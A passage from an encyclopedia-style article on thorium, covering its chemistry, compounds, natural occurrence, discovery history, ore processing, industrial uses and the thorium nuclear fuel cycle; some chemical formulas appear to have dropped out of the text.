has 90 electrons, of which four are valence electrons. Four atomic orbitals are theoretically available for the valence electrons to occupy: 5f, 6d, 7s, and 7p. Despite thorium's position in the f-block of the periodic table, it has an anomalous [Rn]6d27s2 electron configuration in the ground state, as the 5f and 6d subshells in the early actinides are very close in energy, even more so than the 4f and 5d subshells of the lanthanides: thorium's 6d subshells are lower in energy than its 5f subshells, because its 5f subshells are not well-shielded by the filled 6s and 6p subshells and are destabilised. This is due to relativistic effects, which become stronger near the bottom of the periodic table, specifically the relativistic spin–orbit interaction. The closeness in energy levels of the 5f, 6d, and 7s energy levels of thorium results in thorium almost always losing all four valence electrons and occurring in its highest possible oxidation state of +4. This is different from its lanthanide congener cerium, in which +4 is also the highest possible state, but +3 plays an important role and is more stable. Thorium is much more similar to the transition metals zirconium and hafnium than to cerium in its ionization energies and redox potentials, and hence also in its chemistry: this transition-metal-like behaviour is the norm in the first half of the actinide series, from actinium to americium. Despite the anomalous electron configuration for gaseous thorium atoms, metallic thorium shows significant 5f involvement. A hypothetical metallic state of thorium that had the [Rn]6d27s2 configuration with the 5f orbitals above the Fermi level should be hexagonal close packed like the group 4 elements titanium, zirconium, and hafnium, and not face-centred cubic as it actually is. The actual crystal structure can only be explained when the 5f states are invoked, proving that thorium is metallurgically a true actinide. Tetravalent thorium compounds are usually colourless or yellow, like those of silver or lead, as the ion has no 5f or 6d electrons. Thorium chemistry is therefore largely that of an electropositive metal forming a single diamagnetic ion with a stable noble-gas configuration, indicating a similarity between thorium and the main group elements of the s-block. Thorium and uranium are the most investigated of the radioactive elements because their radioactivity is low enough not to require special handling in the laboratory. Reactivity Thorium is a highly reactive and electropositive metal. With a standard reduction potential of −1.90 V for the /Th couple, it is somewhat more electropositive than zirconium or aluminium. Finely divided thorium metal can exhibit pyrophoricity, spontaneously igniting in air. When heated in air, thorium turnings ignite and burn with a brilliant white light to produce the dioxide. In bulk, the reaction of pure thorium with air is slow, although corrosion may occur after several months; most thorium samples are contaminated with varying degrees of the dioxide, which greatly accelerates corrosion. Such samples slowly tarnish, becoming grey and finally black at the surface. At standard temperature and pressure, thorium is slowly attacked by water, but does not readily dissolve in most common acids, with the exception of hydrochloric acid, where it dissolves leaving a black insoluble residue of ThO(OH,Cl)H. It dissolves in concentrated nitric acid containing a small quantity of catalytic fluoride or fluorosilicate ions; if these are not present, passivation by the nitrate can occur, as with uranium and plutonium. Inorganic compounds Most binary compounds of thorium with nonmetals may be prepared by heating the elements together. In air, thorium burns to form , which has the fluorite structure. Thorium dioxide is a refractory material, with the highest melting point (3390 °C) of any known oxide. It is somewhat hygroscopic and reacts readily with water and many gases; it dissolves easily in concentrated nitric acid in the presence of fluoride. When heated in air, thorium dioxide emits intense blue light; the light becomes white when is mixed with its lighter homologue cerium dioxide (, ceria): this is the basis for its previously common application in gas mantles. A flame is not necessary for this effect: in 1901, it was discovered that a hot Welsbach gas mantle (using with 1% ) remained at "full glow" when exposed to a cold unignited mixture of flammable gas and air. The light emitted by thorium dioxide is higher in wavelength than the blackbody emission expected from incandescence at the same temperature, an effect called candoluminescence. It occurs because : Ce acts as a catalyst for the recombination of free radicals that appear in high concentration in a flame, whose deexcitation releases large amounts of energy. The addition of 1% cerium dioxide, as in gas mantles, heightens the effect by increasing emissivity in the visible region of the spectrum; but because cerium, unlike thorium, can occur in multiple oxidation states, its charge and hence visible emissivity will depend on the region on the flame it is found in (as such regions vary in their chemical composition and hence how oxidising or reducing they are). Several binary thorium chalcogenides and oxychalcogenides are also known with sulfur, selenium, and tellurium. All four thorium tetrahalides are known, as are some low-valent bromides and iodides: the tetrahalides are all 8-coordinated hygroscopic compounds that dissolve easily in polar solvents such as water. Many related polyhalide ions are also known. Thorium tetrafluoride has a monoclinic crystal structure like those of zirconium tetrafluoride and hafnium tetrafluoride, where the ions are coordinated with ions in somewhat distorted square antiprisms. The other tetrahalides instead have dodecahedral geometry. Lower iodides (black) and (gold-coloured) can also be prepared by reducing the tetraiodide with thorium metal: they do not contain Th(III) and Th(II), but instead contain and could be more clearly formulated as electride compounds. Many polynary halides with the alkali metals, barium, thallium, and ammonium are known for thorium fluorides, chlorides, and bromides. For example, when treated with potassium fluoride and hydrofluoric acid, forms the complex anion (hexafluorothorate(IV)), which precipitates as an insoluble salt, (potassium hexafluorothorate(IV)). Thorium borides, carbides, silicides, and nitrides are refractory materials, like those of uranium and plutonium, and have thus received attention as possible nuclear fuels. All four heavier pnictogens (phosphorus, arsenic, antimony, and bismuth) also form binary thorium compounds. Thorium germanides are also known. Thorium reacts with hydrogen to form the thorium hydrides and , the latter of which is superconducting below 7.5–8 K; at standard temperature and pressure, it conducts electricity like a metal. The hydrides are thermally unstable and readily decompose upon exposure to air or moisture. Coordination compounds In an acidic aqueous solution, thorium occurs as the tetrapositive aqua ion , which has tricapped trigonal prismatic molecular geometry: at pH < 3, the solutions of thorium salts are dominated by this cation. The ion is the largest of the tetrapositive actinide ions, and depending on the coordination number can have a radius between 0.95 and 1.14 Å. It is quite acidic due to its high charge, slightly stronger than sulfurous acid: thus it tends to undergo hydrolysis and polymerisation (though to a lesser extent than ), predominantly to in solutions with pH 3 or below, but in more alkaline solution polymerisation continues until the gelatinous hydroxide forms and precipitates out (though equilibrium may take weeks to be reached, because the polymerisation usually slows down before the precipitation). As a hard Lewis acid, favours hard ligands with oxygen atoms as donors: complexes with sulfur atoms as donors are less stable and are more prone to hydrolysis. High coordination numbers are the rule for thorium due to its large size. Thorium nitrate pentahydrate was the first known example of coordination number 11, the oxalate tetrahydrate has coordination number 10, and the borohydride (first prepared in the Manhattan Project) has coordination number 14. These thorium salts are known for their high solubility in water and polar organic solvents. Many other inorganic thorium compounds with polyatomic anions are known, such as the perchlorates, sulfates, sulfites, nitrates, carbonates, phosphates, vanadates, molybdates, and chromates, and their hydrated forms. They are important in thorium purification and the disposal of nuclear waste, but most of them have not yet been fully characterised, especially regarding their structural properties. For example, thorium nitrate is produced by reacting thorium hydroxide with nitric acid: it is soluble in water and alcohols and is an important intermediate in the purification of thorium and its compounds. Thorium complexes with organic ligands, such as oxalate, citrate, and EDTA, are much more stable. In natural thorium-containing waters, organic thorium complexes usually occur in concentrations orders of magnitude higher than the inorganic complexes, even when the concentrations of inorganic ligands are much greater than those of organic ligands. In January 2021, the aromaticity has been observed in a large metal cluster anion consisting of 12 bismuth atoms stabilised by a center thorium cation. This compound was shown to be surprisingly stable, unlike many previous known aromatic metal clusters. Organothorium compounds Most of the work on organothorium compounds has focused on the cyclopentadienyl complexes and cyclooctatetraenyls. Like many of the early and middle actinides (up to americium, and also expected for curium), thorium forms a cyclooctatetraenide complex: the yellow , thorocene. It is isotypic with the better-known analogous uranium compound uranocene. It can be prepared by reacting with thorium tetrachloride in tetrahydrofuran (THF) at the temperature of dry ice, or by reacting thorium tetrafluoride with . It is unstable in air and decomposes in water or at 190 °C. Half sandwich compounds are also known, such as , which has a piano-stool structure and is made by reacting thorocene with thorium tetrachloride in tetrahydrofuran. The simplest of the cyclopentadienyls are and : many derivatives are known. The former (which has two forms, one purple and one green) is a rare example of thorium in the formal +3 oxidation state; a formal +2 oxidation state occurs in a derivative. The chloride derivative is prepared by heating thorium tetrachloride with limiting used (other univalent metal cyclopentadienyls can also be used). The alkyl and aryl derivatives are prepared from the chloride derivative and have been used to study the nature of the Th–C sigma bond. Other organothorium compounds are not well-studied. Tetrabenzylthorium, , and tetraallylthorium, , are known, but their structures have not been determined. They decompose slowly at room temperature. Thorium forms the monocapped trigonal prismatic anion , heptamethylthorate(IV), which forms the salt (tmeda = ). Although one methyl group is only attached to the thorium atom (Th–C distance 257.1 pm) and the other six connect the lithium and thorium atoms (Th–C distances 265.5–276.5 pm), they behave equivalently in solution. Tetramethylthorium, , is not known, but its adducts are stabilised by phosphine ligands. Occurrence Formation 232Th is a primordial nuclide, having existed in its current form for over ten billion years; it was formed during the r-process, which probably occurs in supernovae and neutron star mergers. These violent events scattered it across the galaxy. The letter "r" stands for "rapid neutron capture", and occurs in core-collapse supernovae, where heavy seed nuclei such as 56Fe rapidly capture neutrons, running up against the neutron drip line, as neutrons are captured much faster than the resulting nuclides can beta decay back toward stability. Neutron capture is the only way for stars to synthesise elements beyond iron because of the increased Coulomb barriers that make interactions between charged particles difficult at high atomic numbers and the fact that fusion beyond 56Fe is endothermic. Because of the abrupt loss of stability past 209Bi, the r-process is the only process of stellar nucleosynthesis that can create thorium and uranium; all other processes are too slow and the intermediate nuclei alpha decay before they capture enough neutrons to reach these elements. Abundance In the universe, thorium is among the rarest of the primordial elements at rank 77th in cosmic abundance because it is one of the two elements that can be produced only in the r-process (the other being uranium), and also because it has slowly been decaying away from the moment it formed. The only primordial elements rarer than thorium are thulium, lutetium, tantalum, and rhenium, the odd-numbered elements just before the third peak of r-process abundances around the heavy platinum group metals, as well as uranium. In the distant past the abundances of thorium and uranium were enriched by the decay of plutonium and curium isotopes, and thorium was enriched relative to uranium by the decay of 236U to 232Th and the natural depletion of 235U, but these sources have long since decayed and no longer contribute. In the Earth's crust, thorium is much more abundant: with an abundance of 8.1 g/tonne, it is one of the most abundant of the heavy elements, almost as abundant as lead (13 g/tonne) and more abundant than tin (2.1 g/tonne). This is because thorium is likely to form oxide minerals that do not sink into the core; it is classified as a lithophile under the Goldschmidt classification, meaning that it is generally found combined with oxygen. Common thorium compounds are also poorly soluble in water. Thus, even though the refractory elements have the same relative abundances in the Earth as in the Solar System as a whole, there is more accessible thorium than heavy platinum group metals in the crust. On Earth Natural thorium is usually almost pure 232Th, which is the longest-lived and most stable isotope of thorium, having a half-life comparable to the age of the universe. Its radioactive decay is the largest single contributor to the Earth's internal heat; the other major contributors are the shorter-lived primordial radionuclides, which are 238U, 40K, and 235U in descending order of their contribution. (At the time of the Earth's formation, 40K and 235U contributed much more by virtue of their short half-lives, but they have decayed more quickly, leaving the contribution from 232Th and 238U predominant.) Its decay accounts for a gradual decrease of thorium content of the Earth: the planet currently has around 85% of the amount present at the formation of the Earth. The other natural thorium isotopes are much shorter-lived; of them, only 230Th is usually detectable, occurring in secular equilibrium with its parent 238U, and making up at most 0.04% of natural thorium. Thorium only occurs as a minor constituent of most minerals, and was for this reason previously thought to be rare. In fact, it is the 37th most abundant element in the Earth's crust with an abundance of 12 parts per million. In nature, thorium occurs in the +4 oxidation state, together with uranium(IV), zirconium(IV), hafnium(IV), and cerium(IV), and also with scandium, yttrium, and the trivalent lanthanides which have similar ionic radii. Because of thorium's radioactivity, minerals containing it are often metamict (amorphous), their crystal structure having been damaged by the alpha radiation produced by thorium. An extreme example is ekanite, , which almost never occurs in nonmetamict form due to the thorium it contains. Monazite (chiefly phosphates of various rare-earth elements) is the most important commercial source of thorium because it occurs in large deposits worldwide, principally in India, South Africa, Brazil, Australia, and Malaysia. It contains around 2.5% thorium on average, although some deposits may contain up to 20%. Monazite is a chemically unreactive mineral that is found as yellow or brown sand; its low reactivity makes it difficult to extract thorium from it. Allanite (chiefly silicates-hydroxides of various metals) can have 0.1–2% thorium and zircon (chiefly zirconium silicate, ) up to 0.4% thorium. Thorium dioxide occurs as the rare mineral thorianite. Due to its being isotypic with uranium dioxide, these two common actinide dioxides can form solid-state solutions and the name of the mineral changes according to the content. Thorite (chiefly thorium silicate, ), also has a high thorium content and is the mineral in which thorium was first discovered. In thorium silicate minerals, the and ions are often replaced with (where M = Sc, Y, or Ln) and phosphate () ions respectively. Because of the great insolubility of thorium dioxide, thorium does not usually spread quickly through the environment when released. The ion is soluble, especially in acidic soils, and in such conditions the thorium concentration can be higher. History Erroneous report In 1815, the Swedish chemist Jöns Jacob Berzelius analysed an unusual sample of gadolinite from a copper mine in Falun, central Sweden. He noted impregnated traces of a white mineral, which he cautiously assumed to be an earth (oxide in modern chemical nomenclature) of an unknown element. Berzelius had already discovered two elements, cerium and selenium, but he had made a public mistake once, announcing a new element, gahnium, that turned out to be zinc oxide. Berzelius privately named the putative element "thorium" in 1817 and its supposed oxide "thorina" after Thor, the Norse god of thunder. In 1824, after more deposits of the same mineral in Vest-Agder, Norway, were discovered, he retracted his findings, as the mineral (later named xenotime) proved to be mostly yttrium orthophosphate. Discovery In 1828, Morten Thrane Esmark found a black mineral on Løvøya island, Telemark county, Norway. He was a Norwegian priest and amateur mineralogist who studied the minerals in Telemark, where he served as vicar. He commonly sent the most interesting specimens, such as this one, to his father, Jens Esmark, a noted mineralogist and professor of mineralogy and geology at the Royal Frederick University in Christiania (today called Oslo). The elder Esmark determined that it was not a known mineral and sent a sample to Berzelius for examination. Berzelius determined that it contained a new element. He published his findings in 1829, having isolated an impure sample by reducing (potassium pentafluorothorate(IV)) with potassium metal. Berzelius reused the name of the previous supposed element discovery and named the source mineral thorite. Berzelius made some initial characterisations of the new metal and its chemical compounds: he correctly determined that the thorium–oxygen mass ratio of thorium oxide was 7.5 (its actual value is close to that, ~7.3), but he assumed the new element was divalent rather than tetravalent, and so calculated that the atomic mass was 7.5 times that of oxygen (120 amu); it is actually 15 times as large. He determined that thorium was a very electropositive metal, ahead of cerium and behind zirconium in electropositivity. Metallic thorium was isolated for the first time in 1914 by Dutch entrepreneurs Dirk Lely Jr. and Lodewijk Hamburger. Initial chemical classification In the periodic table published by Dmitri Mendeleev in 1869, thorium and the rare-earth elements were placed outside the main body of the table, at the end of each vertical period after the alkaline earth metals. This reflected the belief at that time that thorium and the rare-earth metals were divalent. With the later recognition that the rare earths were mostly trivalent and thorium was tetravalent, Mendeleev moved cerium and thorium to group IV in 1871, which also contained the modern carbon group (group 14) and titanium group (group 4), because their maximum oxidation state was +4. Cerium was soon removed from the main body of the table and placed in a separate lanthanide series; thorium was left with group 4 as it had similar properties to its supposed lighter congeners in that group, such as titanium and zirconium. First uses While thorium was discovered in 1828 its first application dates only from 1885, when Austrian chemist Carl Auer von Welsbach invented the gas mantle, a portable source of light which produces light from the incandescence of thorium oxide when heated by burning gaseous fuels. Many applications were subsequently found for thorium and its compounds, including ceramics, carbon arc lamps, heat-resistant crucibles, and as catalysts for industrial chemical reactions such as the oxidation of ammonia to nitric acid. Radioactivity Thorium was first observed to be radioactive in 1898, by the German chemist Gerhard Carl Schmidt and later that year, independently, by the Polish-French physicist Marie Curie. It was the second element that was found to be radioactive, after the 1896 discovery of radioactivity in uranium by French physicist Henri Becquerel. Starting from 1899, the New Zealand physicist Ernest Rutherford and the American electrical engineer Robert Bowie Owens studied the radiation from thorium; initial observations showed that it varied significantly. It was determined that these variations came from a short-lived gaseous daughter of thorium, which they found to be a new element. This element is now named radon, the only one of the rare radioelements to be discovered in nature as a daughter of thorium rather than uranium. After accounting for the contribution of radon, Rutherford, now working with the British physicist Frederick Soddy, showed how thorium decayed at a fixed rate over time into a series of other elements in work dating from 1900 to 1903. This observation led to the identification of the half-life as one of the outcomes of the alpha particle experiments that led to the disintegration theory of radioactivity. The biological effect of radiation was discovered in 1903. The newly discovered phenomenon of radioactivity excited scientists and the general public alike. In the 1920s, thorium's radioactivity was promoted as a cure for rheumatism, diabetes, and sexual impotence. In 1932, most of these uses were banned in the United States after a federal investigation into the health effects of radioactivity. 10,000 individuals in the United States had been injected with thorium during X-ray diagnosis; they were later found to suffer health issues such as leukaemia and abnormal chromosomes. Public interest in radioactivity had declined by the end of the 1930s. Further classification Up to the late 19th century, chemists unanimously agreed that thorium and uranium were the heaviest members of group 4 and group 6 respectively; the existence of the lanthanides in the sixth row was considered to be a one-off fluke. In 1892, British chemist Henry Bassett postulated a second extra-long periodic table row to accommodate known and undiscovered elements, considering thorium and uranium to be analogous to the lanthanides. In 1913, Danish physicist Niels Bohr published a theoretical model of the atom and its electron orbitals, which soon gathered wide acceptance. The model indicated that the seventh row of the periodic table should also have f-shells filling before the d-shells that were filled in the transition elements, like the sixth row with the lanthanides preceding the 5d transition metals. The existence of a second inner transition series, in the form of the actinides, was not accepted until similarities with the electron structures of the lanthanides had been established; Bohr suggested that the filling of the 5f orbitals may be delayed to after uranium. It was only with the discovery of the first transuranic elements, which from plutonium onward have dominant +3 and +4 oxidation states like the lanthanides, that it was realised that the actinides were indeed filling f-orbitals rather than d-orbitals, with the transition-metal-like chemistry of the early actinides being the exception and not the rule. In 1945, when American physicist Glenn T. Seaborg and his team had discovered the transuranic elements americium and curium, he proposed the actinide concept, realising that thorium was the second member of an f-block actinide series analogous to the lanthanides, instead of being the heavier congener of hafnium in a fourth d-block row. Phasing out In the 1990s, most applications that do not depend on thorium's radioactivity declined quickly due to safety and environmental concerns as suitable safer replacements were found. Despite its radioactivity, the element has remained in use for applications where no suitable alternatives could be found. A 1981 study by the Oak Ridge National Laboratory in the United States estimated that using a thorium gas mantle every weekend would be safe for a person, but this was not the case for the dose received by people manufacturing the mantles or for the soils around some factory sites. Some manufacturers have changed to other materials, such as yttrium. As recently as 2007, some companies continued to manufacture and sell thorium mantles without giving adequate information about their radioactivity, with some even falsely claiming them to be non-radioactive. Nuclear power Thorium has been used as a power source on a prototype scale. The earliest thorium-based reactor was built at the Indian Point Energy Center located in Buchanan, New York, United States in 1962. China may be the first to have a shot at commercialising the technology. The country with the largest estimated reserves of thorium in the world is India, which has sparse reserves of uranium. In the 1950s, India targeted achieving energy independence with their three-stage nuclear power programme. In most countries, uranium was relatively abundant and the progress of thorium-based reactors was slow; in the 20th century, three reactors were built in India and twelve elsewhere. Large-scale research was begun in 1996 by the International Atomic Energy Agency to study the use of thorium reactors; a year later, the United States Department of Energy started their research. Alvin Radkowsky of Tel Aviv University in Israel was the head designer of Shippingport Atomic Power Station in Pennsylvania, the first American civilian reactor to breed thorium. He founded a consortium to develop thorium reactors, which included other laboratories: Raytheon Nuclear Inc. and Brookhaven National Laboratory in the United States, and the Kurchatov Institute in Russia. In the 21st century, thorium's potential for reducing nuclear proliferation and its waste characteristics led to renewed interest in the thorium fuel cycle. India has projected meeting as much as 30% of its electrical demands through thorium-based nuclear power by 2050. In February 2014, Bhabha Atomic Research Centre (BARC), in Mumbai, India, presented their latest design for a "next-generation nuclear reactor" that burns thorium as its fuel core, calling it the Advanced Heavy Water Reactor (AHWR). In 2009, the chairman of the Indian Atomic Energy Commission said that India has a "long-term objective goal of becoming energy-independent based on its vast thorium resources." On 16 June 2023 China's National Nuclear Safety Administration issued a licence to the Shanghai Institute of Applied Physics (SINAP) of the Chinese Academy of Sciences to begin operating the TMSR-LF1, 2 MWt liquid fuel thorium-based molten salt experimental reactor which was completed in August 2021. China is believed to have one of the largest thorium reserves in the world. The exact size of those reserves has not been publicly disclosed, but it is estimated to be enough to meet the country's total energy needs for more than 20,000 years. Nuclear weapons When gram quantities of plutonium were first produced in the Manhattan Project, it was discovered that a minor isotope (240Pu) underwent significant spontaneous fission, which brought into question the viability of a plutonium-fuelled gun-type nuclear weapon. While the Los Alamos team began work on the implosion-type weapon to circumvent this issue, the Chicago team discussed reactor design solutions. Eugene Wigner proposed to use the 240Pu-contaminated plutonium to drive the conversion of thorium into 233U in a special converter reactor. It was hypothesized that the 233U would then be usable in a gun-type weapon, though concerns about contamination from 232U were voiced. Progress on the implosion weapon was sufficient, and this converter was not developed further, but the design had enormous influence on the development of nuclear energy. It was the first detailed description of a highly enriched water-cooled, water-moderated reactor similar to future naval and commercial power reactors. During the Cold War the United States explored the possibility of using 232Th as a source of 233U to be used in a nuclear bomb; they fired a test bomb in 1955. They concluded that a 233U-fired bomb would be a very potent weapon, but it bore few sustainable "technical advantages" over the contemporary uranium–plutonium bombs, especially since 233U is difficult to produce in isotopically pure form. Thorium metal was used in the radiation case of at least one nuclear weapon design deployed by the United States (the W71). Production The low demand makes working mines for extraction of thorium alone not profitable, and it is almost always extracted with the rare earths, which themselves may be by-products of production of other minerals. The current reliance on monazite for production is due to thorium being largely produced as a by-product; other sources such as thorite contain more thorium and could easily be used for production if demand rose. Present knowledge of the distribution of thorium resources is poor, as low demand has led to exploration efforts being relatively minor. In 2014, world production of the monazite concentrate, from which thorium would be extracted, was 2,700 tonnes. The common production route of thorium constitutes concentration of thorium minerals; extraction of thorium from the concentrate; purification of thorium; and (optionally) conversion to compounds, such as thorium dioxide. Concentration There are two categories of thorium minerals for thorium extraction: primary and secondary. Primary deposits occur in acidic granitic magmas and pegmatites. They are concentrated, but of small size. Secondary deposits occur at the mouths of rivers in granitic mountain regions. In these deposits, thorium is enriched along with other heavy minerals. Initial concentration varies with the type of deposit. For the primary deposits, the source pegmatites, which are usually obtained by mining, are divided into small parts and then undergo flotation. Alkaline earth metal carbonates may be removed after reaction with hydrogen chloride; then follow thickening, filtration, and calcination. The result is a concentrate with rare-earth content of up to 90%. Secondary materials (such as coastal sands) undergo gravity separation. Magnetic separation follows, with a series of magnets of increasing strength. Monazite obtained by this method can be as pure as 98%. Industrial production in the 20th century relied on treatment with hot, concentrated sulfuric acid in cast iron vessels, followed by selective precipitation by dilution with water, as on the subsequent steps. This method relied on the specifics of the technique and the concentrate grain size; many alternatives have been proposed, but only one has proven effective economically: alkaline digestion with hot sodium hydroxide solution. This is more expensive than the original method but yields a higher purity of thorium; in particular, it removes phosphates from the concentrate. Acid digestion Acid digestion is a two-stage process, involving the use of up to 93% sulfuric acid at 210–230 °C. First, sulfuric acid in excess of 60% of the sand mass is added, thickening the reaction mixture as products are formed. Then, fuming sulfuric acid is added and the mixture is kept at the same temperature for another five hours to reduce the volume of solution remaining after dilution. The concentration of the sulfuric acid is selected based on reaction rate and viscosity, which both increase with concentration, albeit with viscosity retarding the reaction. Increasing the temperature also speeds up the reaction, but temperatures of 300 °C and above must be avoided, because they cause insoluble thorium pyrophosphate to form. Since dissolution is very exothermic, the monazite sand cannot be added to the acid too quickly. Conversely, at temperatures below 200 °C the reaction does not go fast enough for the process to be practical. To ensure that no precipitates form to block the reactive monazite surface, the mass of acid used must be twice that of the sand, instead of the 60% that would be expected from stoichiometry. The mixture is then cooled to 70 °C and diluted with ten times its volume of cold water, so that any remaining monazite sinks to the bottom while the rare earths and thorium remain in solution. Thorium may then be separated by precipitating it as the phosphate at pH 1.3, since the rare earths do not precipitate until pH 2. Alkaline digestion Alkaline digestion is carried out in 30–45% sodium hydroxide solution at about 140 °C for about three hours. Too high a temperature leads to the formation of poorly soluble thorium oxide and an excess of uranium in the filtrate, and too low a concentration of alkali leads to a very slow reaction. These reaction conditions are rather mild and require monazite sand with a particle size under 45 μm. Following filtration, the filter cake includes thorium and the rare earths as their hydroxides, uranium as sodium diuranate, and phosphate as trisodium phosphate. This crystallises trisodium phosphate decahydrate when cooled below 60 °C; uranium impurities in this product increase with the amount of silicon dioxide in the reaction mixture, necessitating recrystallisation before commercial use. The hydroxides are dissolved at 80 °C in 37% hydrochloric acid. Filtration of the remaining precipitates followed by addition of 47% sodium hydroxide results in the precipitation of thorium and uranium at about pH 5.8. Complete drying of the precipitate must be avoided, as air may oxidise cerium from the +3 to the +4 oxidation state, and the cerium(IV) formed can liberate free chlorine from the hydrochloric acid. The rare earths again precipitate out at higher pH. The precipitates are neutralised by the original sodium hydroxide solution, although most of the phosphate must first be removed to avoid precipitating rare-earth phosphates. Solvent extraction may also be used to separate out the thorium and uranium, by dissolving the resultant filter cake in nitric acid. The presence of titanium hydroxide is deleterious as it binds thorium and prevents it from dissolving fully. Purification High thorium concentrations are needed in nuclear applications. In particular, concentrations of atoms with high neutron capture cross-sections must be very low (for example, gadolinium concentrations must be lower than one part per million by weight). Previously, repeated dissolution and recrystallisation was used to achieve high purity. Today, liquid solvent extraction procedures involving selective complexation of are used. For example, following alkaline digestion and the removal of phosphate, the resulting nitrato complexes of thorium, uranium, and the rare earths can be separated by extraction with tributyl phosphate in kerosene. Modern applications Non-radioactivity-related uses of thorium have been in decline since the 1950s due to environmental concerns largely stemming from the radioactivity of thorium and its decay products. Most thorium applications use its dioxide (sometimes called "thoria" in the industry), rather than the metal. This compound has a melting point of 3300 °C (6000 °F), the highest of all known oxides; only a few substances have higher melting points. This helps the compound remain solid in a flame, and it considerably increases the brightness of the flame; this is the main reason thorium is used in gas lamp mantles. All substances emit energy (glow) at high temperatures, but the light emitted by thorium is nearly all in the visible spectrum, hence the brightness of thorium mantles. Energy, some of it in the form of visible light, is emitted when thorium is exposed to a source of energy itself, such as a cathode ray, heat, or ultraviolet light. This effect is shared by cerium dioxide, which converts ultraviolet light into visible light more efficiently, but thorium dioxide gives a higher flame temperature, emitting less infrared light. Thorium in mantles, though still common, has been progressively replaced with yttrium since the late 1990s. According to the 2005 review by the United Kingdom's National Radiological Protection Board, "although [thoriated gas mantles] were widely available a few years ago, they are not any more." Thorium is also used to make cheap permanent negative ion generators, such as in pseudoscientific health bracelets. During the production of incandescent filaments, recrystallisation of tungsten is significantly lowered by adding small amounts of thorium dioxide to the tungsten sintering powder before drawing the filaments. A small addition of thorium to tungsten thermocathodes considerably reduces the work function of electrons; as a result, electrons are emitted at considerably lower temperatures. Thorium forms a one-atom-thick layer on the surface of tungsten. The work function from a thorium surface is lowered possibly because of the electric field on the interface between thorium and tungsten formed due to thorium's greater electropositivity. Since the 1920s, thoriated tungsten wires have been used in electronic tubes and in the cathodes and anticathodes of X-ray tubes and rectifiers.The reactivity of thorium with atmospheric oxygen required the introduction of an evaporated magnesium layer as a getter for impurities in the evacuated tubes, giving them their characteristic metallic inner coating. The introduction of transistors in the 1950s significantly diminished this use, but not entirely. Thorium dioxide is used in gas tungsten arc welding (GTAW) to increase the high-temperature strength of tungsten electrodes and improve arc stability. Thorium oxide is being replaced in this use with other oxides, such as those of zirconium, cerium, and lanthanum. Thorium dioxide is found in refractory ceramics, such as high-temperature laboratory crucibles, either as the primary ingredient or as an addition to zirconium dioxide. An alloy of 90% platinum and 10% thorium is an effective catalyst for oxidising ammonia to nitrogen oxides, but this has been replaced by an alloy of 95% platinum and 5% rhodium because of its better mechanical properties and greater durability. When added to glass, thorium dioxide helps increase its refractive index and decrease dispersion. Such glass finds application in high-quality lenses for cameras and scientific instruments. The radiation from these lenses can darken them and turn them yellow over a period of years and it degrades film, but the health risks are minimal. Yellowed lenses may be restored to their original colourless state by lengthy exposure to intense ultraviolet radiation. Thorium dioxide has since been replaced in this application by rare-earth oxides, such as lanthanum, as they provide similar effects and are not radioactive. Thorium tetrafluoride is used as an anti-reflection material in multilayered optical coatings. It is transparent to electromagnetic waves having wavelengths in the range of 0.350–12 μm, a range that includes near ultraviolet, visible and mid infrared light. Its radiation is primarily due to alpha particles, which can be easily stopped by a thin cover layer of another material. Replacements for thorium tetrafluoride are being developed as of the 2010s, which include Lanthanum trifluoride. Mag-Thor alloys (also called thoriated magnesium) found use in some aerospace applications, though such uses have been phased out due to concerns over radioactivity. Potential use for nuclear energy The main nuclear power source in a reactor is the neutron-induced fission of a nuclide; the synthetic fissile nuclei 233U and 239Pu can be bred from neutron capture by the naturally occurring quantity nuclides 232Th and 238U. 235U occurs naturally in significant amounts and is also fissile. In the thorium fuel cycle, the fertile isotope 232Th is bombarded by slow neutrons, undergoing neutron capture to become 233Th, which undergoes two consecutive beta decays to become first 233Pa and then the fissile 233U: {^{232}_{90}Th} ->[\text{(n,}\gamma\text{)}] {^{233}_{90}Th}->[\beta^-][\text{21.8 min}] {^{233}_{91}Pa} ->[\beta^-][\text{27 days}] {^{233}_{92}U} \ (->[\alpha][1.60 \times 10^5\text{years}]) 233U is fissile and can be used as a nuclear fuel in the same way as 235U or 239Pu. When 233U undergoes nuclear fission, the neutrons emitted can strike further 232Th nuclei, continuing the cycle. This parallels the uranium fuel cycle in fast breeder reactors where 238U undergoes neutron capture to become 239U, beta decaying to first 239Np and then fissile 239Pu. The fission of produces 2.48 neutrons on average. One neutron is needed to keep the fission reaction going. For a self-contained continuous breeding cycle, one more neutron is needed to breed a new atom from the fertile . This leaves a margin of 0.45 neutrons (or 18% of the neutron flux) for losses. Advantages Thorium is more abundant than uranium, and can satisfy world energy demands for longer. It is particularly suitable for being used as fertile material in molten salt reactors. 232Th absorbs neutrons more readily than 238U, and 233U has a higher probability of fission upon neutron capture (92.0%) than 235U (85.5%) or 239Pu (73.5%). It also releases more neutrons upon fission on average. A single neutron capture by 238U produces transuranic waste along with the fissile 239Pu, but 232Th only produces this waste after five captures, forming 237Np. This number of captures does not happen for 98–99% of the 232Th nuclei because the intermediate products 233U or 235U undergo fission, and fewer long-lived transuranics are produced. Because of this, thorium is a potentially attractive alternative to uranium in mixed oxide fuels to minimise the generation of transuranics and maximise the destruction of plutonium. Thorium fuels result in a safer and better-performing reactor core because thorium dioxide has a higher melting point, higher thermal conductivity, and a lower coefficient of thermal expansion. It is more stable chemically than the now-common fuel uranium dioxide, because the latter oxidises to triuranium octoxide (), becoming substantially less dense. Disadvantages The used fuel is difficult and dangerous to reprocess because many of the daughters of 232Th and 233U are strong gamma emitters. All 233U production methods result in impurities of 232U, either from parasitic knock-out (n,2n) reactions on 232Th, 233Pa, or 233U that result in the loss of a neutron, or from double neutron capture of 230Th, an impurity in natural 232Th: + n → + ( ) + n → + 232U by itself is not particularly harmful, but quickly decays to produce the strong gamma emitter 208Tl. (232Th follows the same decay chain, but its much longer half-life means that the quantities of 208Tl produced are negligible.) These impurities of 232U make 233U easy to detect and dangerous to work on, and the impracticality of their separation limits the possibilities of nuclear proliferation using 233U as the fissile material. 233Pa has a relatively long half-life of 27 days and a high cross section for neutron capture. Thus it is a neutron poison: instead of rapidly decaying to the useful 233U, a significant amount of 233Pa converts to 234U and consumes neutrons, degrading the reactor efficiency. To avoid this, 233Pa is extracted from the active zone of thorium molten salt reactors during their operation, so that it does not have a chance to capture a neutron and will only decay to 233U. The irradiation of 232Th with neutrons, followed by its processing, need to be mastered before these advantages can be realised, and this requires more advanced technology than the uranium and plutonium fuel cycle; research continues in this area. Others cite the low commercial viability of the thorium fuel cycle: the international Nuclear Energy Agency predicts that the thorium cycle will never be commercially viable while uranium is available in abundance—a situation which may persist "in the coming decades". The 